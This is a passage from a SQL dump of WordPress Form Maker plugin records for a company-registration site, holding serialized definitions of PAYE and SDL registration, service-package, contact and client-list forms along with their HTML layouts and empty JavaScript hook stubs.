Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(72,1,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Business%</div><div wdid=\"13\" class=\"wdform_row ui-sortable-handle\">%13 - Tax%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\">%9 - Web Design%</div><div wdid=\"10\" class=\"wdform_row ui-sortable-handle\">%10 - Word Verification:%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - type_submit_reset_11%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\">%12 - Services%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',14,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business#**label**#type_checkbox#****#13#**id**#Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#10#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#11#**id**#type_submit_reset_11#**label**#type_submit_reset#****#12#**id**#Services#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business#**label**#type_checkbox#****#13#**id**#Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#10#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#11#**id**#type_submit_reset_11#**label**#type_submit_reset#****#12#**id**#Services#**label**#type_checkbox#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Business*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Name reservation***Company registration***BEE Affidavit***Share Certificate***Share register*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Name reservation***Company registration***BEE Affidavit***Share Certificate***Share register*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*13*:*id*:*type_checkbox*:*type*:*Tax*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Tax Clearence***Income Tax Registration***Vat Registration***PAYE Registration*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Tax Clearence***Income Tax Registration***Vat Registration***PAYE Registration*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages & Appointments***Employee Management***Work & Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*9*:*id*:*type_checkbox*:*type*:*Web Design*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*10*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*1*:*w_count*:*+, -, *, /*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*11*:*id*:*type_submit_reset*:*type*:*type_submit_reset_11*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*12*:*id*:*type_checkbox*:*type*:*Services*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Business***Tax***Cloud Accounting***Cloud Applications***Website Development***E-commerce***E-mail Marketing*:*w_choices*:*false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business***Tax***Cloud Accounting***Cloud Applications***Website Development***E-commerce***E-mail Marketing*:*w_choices_value*:********************:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','','fadeInLeft',0),(73,0,2,'MAW Contact Us','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Enter your E-mail:%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Message%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - type_submit_reset_8%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',9,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#3#**id**#Message subject#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*First***Last*******:*w_first_val*:*First***Last*******:*w_title*:*Title*********Middle*:*w_mini_labels*:*250*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*Enter your E-mail:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*7*:*id*:*type_textarea*:*type*:*Message*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size_w*:*120*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_submit_reset*:*type*:*type_submit_reset_8*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Contact Us','You may contact us by filling in this form any time you need professional support or have any questions. You can also fill in the form to leave your comments or feedback.','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/2.png','flash',1),(74,0,2,'Co Reg Contact Us','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Enter your E-mail:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - custom_9%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Message%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - type_submit_reset_8%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',10,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#9#**id**#custom_9#**label**#type_editor#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#3#**id**#Message subject#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#9#**id**#custom_9#**label**#type_editor#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*First***Last*******:*w_first_val*:*First***Last*******:*w_title*:*Title*********Middle*:*w_mini_labels*:*250*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*Enter your E-mail:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*9*:*id*:*type_editor*:*type*:*custom_9*:*w_field_label*:*<p><span style=\"font-size: 18pt;\" data-mce-style=\"font-size: 18pt;\"><strong>How may we assist you today</strong></span><br></p><p>Feel free to simply ask a question or leave a comment<br data-mce-bogus=\"1\"></p>*:*w_editor*:**:*new_field*:*7*:*id*:*type_textarea*:*type*:*Message*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size_w*:*120*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_submit_reset*:*type*:*type_submit_reset_8*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Contact Us','<span style=\"color: #ffffff;\">You may contact us by filling in this form any time you  have any questions. You can also fill in the form to leave your comments or feedback.</span>','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/2.png','rotateInUpRight',1),(75,0,1,'Client List Form','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - First Name%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Last Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - E-mail:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Phone%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Website%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Address%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\">%12 - type_submit_reset_12%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',8,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',13,1,'1#**id**#First Name#**label**#type_text#****#2#**id**#Last Name#**label**#type_text#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone#**label**#type_text#****#5#**id**#Website#**label**#type_text#****#6#**id**#Street Address#**label**#type_address#****#7#**id**#Street Address Line 2#**label**#type_address#****#8#**id**#City#**label**#type_address#****#9#**id**#State#**label**#type_address#****#10#**id**#Postal / Zip Code#**label**#type_address#****#11#**id**#Country#**label**#type_address#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#First Name#**label**#type_text#****#2#**id**#Last Name#**label**#type_text#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone#**label**#type_text#****#5#**id**#Website#**label**#type_text#****#6#**id**#Street Address#**label**#type_address#****#7#**id**#Street Address Line 2#**label**#type_address#****#8#**id**#City#**label**#type_address#****#9#**id**#State#**label**#type_address#****#10#**id**#Postal / Zip Code#**label**#type_address#****#11#**id**#Country#**label**#type_address#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*First Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Last Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Phone*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Website*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*220*:*w_size*:*http://example.com*:*w_first_val*:*http://example.com*:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*6*:*id*:*type_address*:*type*:*Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*220*:*w_size*:*Street Address***Street Address Line 2***City***State***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*12*:*id*:*type_submit_reset*:*type*:*type_submit_reset_12*:*w_field_label*:*Subscribe*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,27970,1,'Join Our Customer Base','','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/1.png','rotateInUpRight',1),(76,1,1,'Client List Form','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - First Name%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Last Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - E-mail:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Phone%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Website%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Address%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\">%12 - type_submit_reset_12%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',8,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',13,1,'1#**id**#First Name#**label**#type_text#****#2#**id**#Last Name#**label**#type_text#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone#**label**#type_text#****#5#**id**#Website#**label**#type_text#****#6#**id**#Street Address#**label**#type_address#****#7#**id**#Street Address Line 2#**label**#type_address#****#8#**id**#City#**label**#type_address#****#9#**id**#State#**label**#type_address#****#10#**id**#Postal / Zip Code#**label**#type_address#****#11#**id**#Country#**label**#type_address#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#First Name#**label**#type_text#****#2#**id**#Last Name#**label**#type_text#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone#**label**#type_text#****#5#**id**#Website#**label**#type_text#****#6#**id**#Street Address#**label**#type_address#****#7#**id**#Street Address Line 2#**label**#type_address#****#8#**id**#City#**label**#type_address#****#9#**id**#State#**label**#type_address#****#10#**id**#Postal / Zip Code#**label**#type_address#****#11#**id**#Country#**label**#type_address#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*First Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Last Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail 